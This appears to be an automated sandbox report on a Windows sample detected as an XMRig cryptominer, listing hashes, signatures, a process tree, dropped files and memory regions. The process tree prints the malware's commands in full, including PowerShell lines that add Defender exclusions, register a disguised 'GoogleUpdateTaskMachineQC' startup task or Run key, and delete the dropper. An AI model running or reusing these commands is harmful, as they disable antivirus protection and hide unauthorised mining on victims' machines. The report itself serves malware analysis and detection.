Resubmissions

25-01-2024 16:55

240125-vfcyksbhgr 10

24-01-2024 17:15

240124-vstf4aecaj 10

23-01-2024 19:27

240123-x6cfvagbd9 10

23-01-2024 19:27

240123-x6bvbafgem 10

23-01-2024 19:27

240123-x6bjjsgbd8 10

23-01-2024 19:27

240123-x6ax1sfgek 10

23-01-2024 19:27

240123-x6abgsfgej 10

23-01-2024 19:27

240123-x591qagbd7 10

23-01-2024 19:27

240123-x59d7agbd6 10

23-01-2024 19:27

240123-x584esgbd5 10

Analysis

  • max time kernel
    1801s
  • max time network
    1796s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2024 19:27

General

  • Target

    grhsghsGHswgh/JqLvG94UkYjhxAeg.exe

  • Size

    2.0MB

  • MD5

    a16a669a09bf158058b83e04e69fe38e

  • SHA1

    f6c94763850d9e590d86057139e8895a7aacdeea

  • SHA256

    cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

  • SHA512

    658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

  • SSDEEP

    49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 28 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 29 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 30 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3520
      • C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\JqLvG94UkYjhxAeg.exe
        "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\JqLvG94UkYjhxAeg.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:3612
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3812
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1032
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\grhsghsGHswgh\JqLvG94UkYjhxAeg.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3572
        • C:\Windows\System32\choice.exe
          choice /C Y /N /D Y /T 3
          3⤵
            PID:372
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:524
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
            3⤵
              PID:4776
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:4852
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
            2⤵
            • Drops file in System32 directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            PID:1184
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe qtdiqnkejoz
            2⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Suspicious behavior: EnumeratesProcesses
            PID:4256
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            • Suspicious use of WriteProcessMemory
            PID:2492
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic PATH Win32_VideoController GET Name, VideoProcessor
              3⤵
              • Detects videocard installed
              PID:4516
          • C:\Windows\System32\cmd.exe
            C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
            2⤵
            • Drops file in Program Files directory
            PID:1776
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz
            2⤵
              PID:1908
          • C:\Program Files\Google\Chrome\updater.exe
            "C:\Program Files\Google\Chrome\updater.exe"
            1⤵
            • Suspicious use of NtCreateUserProcessOtherParentProcess
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1508

          Network

          MITRE ATT&CK Matrix ATT&CK v13

          Discovery

          System Information Discovery

          1
          T1082

          Query Registry

          1
          T1012

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Program Files\Google\Chrome\updater.exe
            Filesize

            2.0MB

            MD5

            a16a669a09bf158058b83e04e69fe38e

            SHA1

            f6c94763850d9e590d86057139e8895a7aacdeea

            SHA256

            cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e

            SHA512

            658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6

          • C:\Program Files\Google\Libs\g.log
            Filesize

            226B

            MD5

            fdba80d4081c28c65e32fff246dc46cb

            SHA1

            74f809dedd1fc46a3a63ac9904c80f0b817b3686

            SHA256

            b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

            SHA512

            b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            944B

            MD5

            bd5940f08d0be56e65e5f2aaf47c538e

            SHA1

            d7e31b87866e5e383ab5499da64aba50f03e8443

            SHA256

            2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6

            SHA512

            c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            e28a5c160c554fdda5514ec50c3cbb43

            SHA1

            669d6565b81e8da6c158cac3d98adf550ba55b79

            SHA256

            21ae1461ea18b70b77e25d83d5bc677e04f0ede801ea4e3eae352598e49888cf

            SHA512

            862e6a11810e82bafd2b287e57f68fcf770bd5b4e28b705079712a7d07e6b957a99904556a8ef42a90baaba0c798b4fb55f6bba556d26c3eb19dfd9f423f1089

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uuxqqcob.wmh.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            4KB

            MD5

            bdb25c22d14ec917e30faf353826c5de

            SHA1

            6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

            SHA256

            e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

            SHA512

            b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

          • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            b42c70c1dbf0d1d477ec86902db9e986

            SHA1

            1d1c0a670748b3d10bee8272e5d67a4fabefd31f

            SHA256

            8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

            SHA512

            57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

          • memory/524-53-0x000001B72F4D0000-0x000001B72F4E0000-memory.dmp
            Filesize

            64KB

          • memory/524-56-0x00007FFE31410000-0x00007FFE31ED1000-memory.dmp
            Filesize

            10.8MB

          • memory/524-40-0x00007FFE31410000-0x00007FFE31ED1000-memory.dmp
            Filesize

            10.8MB

          • memory/524-42-0x000001B72F4D0000-0x000001B72F4E0000-memory.dmp
            Filesize

            64KB

          • memory/524-41-0x000001B72F4D0000-0x000001B72F4E0000-memory.dmp
            Filesize

            64KB

          • memory/1032-20-0x00007FFE31410000-0x00007FFE31ED1000-memory.dmp
            Filesize

            10.8MB

          • memory/1032-21-0x0000027A2D390000-0x0000027A2D3A0000-memory.dmp
            Filesize

            64KB

          • memory/1032-22-0x0000027A2D390000-0x0000027A2D3A0000-memory.dmp
            Filesize

            64KB

          • memory/1032-33-0x0000027A2D390000-0x0000027A2D3A0000-memory.dmp
            Filesize

            64KB

          • memory/1032-35-0x0000027A2D390000-0x0000027A2D3A0000-memory.dmp
            Filesize

            64KB

          • memory/1032-37-0x00007FFE31410000-0x00007FFE31ED1000-memory.dmp
            Filesize

            10.8MB

          • memory/1184-94-0x000001D0ACD10000-0x000001D0ACD20000-memory.dmp
            Filesize

            64KB

          • memory/1184-120-0x00007FFE31410000-0x00007FFE31ED1000-memory.dmp
            Filesize

            10.8MB

          • memory/1184-118-0x000001D0ACD10000-0x000001D0ACD20000-memory.dmp
            Filesize

            64KB

          • memory/1184-117-0x000001D0ACD10000-0x000001D0ACD20000-memory.dmp
            Filesize

            64KB

          • memory/1184-116-0x000001D0AF190000-0x000001D0AF245000-memory.dmp
            Filesize

            724KB

          • memory/1184-115-0x00007FF444250000-0x00007FF444260000-memory.dmp
            Filesize

            64KB

          • memory/1184-95-0x000001D0ACD10000-0x000001D0ACD20000-memory.dmp
            Filesize

            64KB

          • memory/1184-93-0x00007FFE31410000-0x00007FFE31ED1000-memory.dmp
            Filesize

            10.8MB

          • memory/1508-87-0x00007FF745DE0000-0x00007FF745FF1000-memory.dmp
            Filesize

            2.1MB

          • memory/1508-126-0x00007FF745DE0000-0x00007FF745FF1000-memory.dmp
            Filesize

            2.1MB

          • memory/1508-57-0x00007FF745DE0000-0x00007FF745FF1000-memory.dmp
            Filesize

            2.1MB

          • memory/1908-158-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-162-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-194-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-192-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-190-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-188-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-186-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-184-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-182-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-180-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-178-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-176-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-174-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-172-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-170-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-168-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-166-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-164-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-160-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-156-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-154-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-125-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-124-0x0000028DA86B0000-0x0000028DA86D0000-memory.dmp
            Filesize

            128KB

          • memory/1908-148-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-146-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-130-0x0000028DA8D80000-0x0000028DA8DA0000-memory.dmp
            Filesize

            128KB

          • memory/1908-144-0x0000028DA8DC0000-0x0000028DA8DE0000-memory.dmp
            Filesize

            128KB

          • memory/1908-132-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-134-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-135-0x0000028DA8DA0000-0x0000028DA8DC0000-memory.dmp
            Filesize

            128KB

          • memory/1908-136-0x0000028DA8DC0000-0x0000028DA8DE0000-memory.dmp
            Filesize

            128KB

          • memory/1908-138-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-143-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-140-0x00007FF6A90A0000-0x00007FF6A9894000-memory.dmp
            Filesize

            8.0MB

          • memory/1908-141-0x0000028DA8DA0000-0x0000028DA8DC0000-memory.dmp
            Filesize

            128KB

          • memory/3612-34-0x00007FF673F10000-0x00007FF674121000-memory.dmp
            Filesize

            2.1MB

          • memory/3612-39-0x00007FF673F10000-0x00007FF674121000-memory.dmp
            Filesize

            2.1MB

          • memory/3612-0-0x00007FF673F10000-0x00007FF674121000-memory.dmp
            Filesize

            2.1MB

          • memory/3812-7-0x00000182E2100000-0x00000182E2122000-memory.dmp
            Filesize

            136KB

          • memory/3812-18-0x00007FFE31410000-0x00007FFE31ED1000-memory.dmp
            Filesize

            10.8MB

          • memory/3812-15-0x00000182E0760000-0x00000182E0770000-memory.dmp
            Filesize

            64KB

          • memory/3812-14-0x00000182E0760000-0x00000182E0770000-memory.dmp
            Filesize

            64KB

          • memory/3812-12-0x00000182E0760000-0x00000182E0770000-memory.dmp
            Filesize

            64KB

          • memory/3812-13-0x00000182E0760000-0x00000182E0770000-memory.dmp
            Filesize

            64KB

          • memory/3812-11-0x00007FFE31410000-0x00007FFE31ED1000-memory.dmp
            Filesize

            10.8MB

          • memory/4256-139-0x00007FF686050000-0x00007FF686066000-memory.dmp
            Filesize

            88KB

          • memory/4256-131-0x00007FF686050000-0x00007FF686066000-memory.dmp
            Filesize

            88KB

          • memory/4852-59-0x000001909BA40000-0x000001909BA50000-memory.dmp
            Filesize

            64KB

          • memory/4852-58-0x00007FFE31410000-0x00007FFE31ED1000-memory.dmp
            Filesize

            10.8MB

          • memory/4852-78-0x000001909DE80000-0x000001909DE9C000-memory.dmp
            Filesize

            112KB

          • memory/4852-80-0x000001909DF60000-0x000001909DF6A000-memory.dmp
            Filesize

            40KB

          • memory/4852-91-0x00007FFE31410000-0x00007FFE31ED1000-memory.dmp
            Filesize

            10.8MB

          • memory/4852-79-0x000001909DEA0000-0x000001909DF55000-memory.dmp
            Filesize

            724KB

          • memory/4852-88-0x000001909BA40000-0x000001909BA50000-memory.dmp
            Filesize

            64KB

          • memory/4852-86-0x000001909E100000-0x000001909E10A000-memory.dmp
            Filesize

            40KB

          • memory/4852-85-0x000001909E0F0000-0x000001909E0F6000-memory.dmp
            Filesize

            24KB

          • memory/4852-84-0x000001909E0C0000-0x000001909E0C8000-memory.dmp
            Filesize

            32KB

          • memory/4852-83-0x000001909E110000-0x000001909E12A000-memory.dmp
            Filesize

            104KB

          • memory/4852-82-0x000001909E0B0000-0x000001909E0BA000-memory.dmp
            Filesize

            40KB

          • memory/4852-81-0x000001909E0D0000-0x000001909E0EC000-memory.dmp
            Filesize

            112KB